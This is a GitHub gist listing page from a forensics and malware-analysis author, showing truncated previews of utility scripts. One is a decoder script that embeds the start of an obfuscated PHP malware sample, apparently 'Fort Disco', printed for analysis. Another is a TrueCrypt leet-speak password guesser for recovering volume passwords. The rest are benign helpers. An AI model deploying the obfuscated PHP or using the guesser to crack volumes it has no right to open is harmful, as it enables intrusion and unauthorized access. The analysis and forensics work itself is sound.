Brian Baskin Rurik
Rurik
/ gist:5440114
Last active
December 16, 2015 13:09
See if a process name is currently running or not (Windows)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Based on WMI code from http://mail.python.org/pipermail/python-win32/2006-March/004340.html | |
| import os | |
| def process_running(procname): | |
| def find_pid(processname): | |
| import win32com.client | |
| for proc in win32com.client.GetObject('winmgmts:').InstancesOf('win32_process'): | |
| if proc.Name.upper() == processname.upper(): | |
| return proc.Properties_('ProcessId') | |
Rurik
/ TrueCrypt_Guess.py
Created
May 5, 2013 15:13
TrueCrypt password guesser for leet-speak passwords. Blog post here: http://ghettoforensics.blogspot.com/2013/05/31337-password-guessing.html
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import subprocess | |
| tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe" | |
| tc_file = "E:\\test.tlc" | |
| drive_letter = "P" | |
| def leet_lookup(char): | |
| list = {"a": ["a","A","@"], | |
| "b": ["b", "B", "8"], |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| from PyQt4.QtCore import * | |
| from PyQt4.QtGui import * | |
| import base64 | |
| def main(): | |
| app = QApplication(sys.argv) | |
| w = MyWindow() | |
| w.show() |
Rurik
/ encoded_PHP_decoder.py
Last active
April 3, 2021 16:46
A quickie decoder script for encoded PHP code. May be Fort Disco?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| script = """ | |
| <? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' |
Rurik
/ gist:6556041
Last active
March 6, 2024 21:31
Python functions to compress folder paths to include their environment variable. This is the opposite of os.path.expandvars(). For example, "C:\Windows\system32\cmd.exe" would resolve to "%WINDIR%\system32\cmd.exe".
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #@bbaskin | |
| import os | |
| import re | |
| # Thanks to Andrew Havens of Cipher Tech for figuring out how to escape the paranthesis to work with | |
| # both expandvars and regex | |
| def generalize_vars_init(): | |
| """ | |
| Initialize a dictionary with the local system's environment variables. |
Rurik
/ multibyte_xor.py
Last active
August 7, 2025 16:56
Generic code to do a multi-byte XOR encoding
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Python 2 | |
| def multibyte_xor(data, key): | |
| from itertools import izip, cycle | |
| return ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(data, cycle(key))) | |
| # Python 3 | |
| def multibyte_xor(data, key): | |
| from itertools import cycle | |
| return bytes([b ^ k for b, k in zip(data, cycle(key))]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\Command Prompt Here\command] | |
| @="cmd.exe /k cd \"%L\"" | |
Rurik
/ asm_find_math.py
Last active
September 16, 2023 17:17
Detect subroutines that may have encryption/encoding routines by finding XOR and shift routines.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Automatically find XOR/SHL/SHR routines from an executable | |
| # Uses IDAW (text IDA) | |
| # @bbaskin - brian @ thebaskins.com | |
| # While other, more powerful scripts like FindCrypt find known | |
| # algorithms this is used to find custom encoding or modified | |
| # encryption routines | |
| """ | |
| Script results: | |
| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |
Rurik
/ getNETversion.py
Created
September 30, 2014 14:48
Determine the .NET version used to compile a .NET executable.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def get_NET_version(data): | |
| """ | |
| Code to extract .NET compiled version. | |
| typedef struct t_MetaData_Header { | |
| DWORD Signature; // BSJB | |
| WORD MajorVersion; | |
| WORD MinorVersion; | |
| DWORD Unknown1; | |
| DWORD VersionSize; | |
| PBYTE VersionString; |
Rurik
/ gist:4402ab9a7a1b3fbc14d7
Created
October 23, 2014 18:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am Rurik on github. | |
| * I am bbaskin (https://keybase.io/bbaskin) on keybase. | |
| * I have a public key whose fingerprint is AFD8 C071 A2CE E394 D226 4F19 8732 1B4E 326D FD20 | |
| To claim this, I am signing this object: |
OlderNewer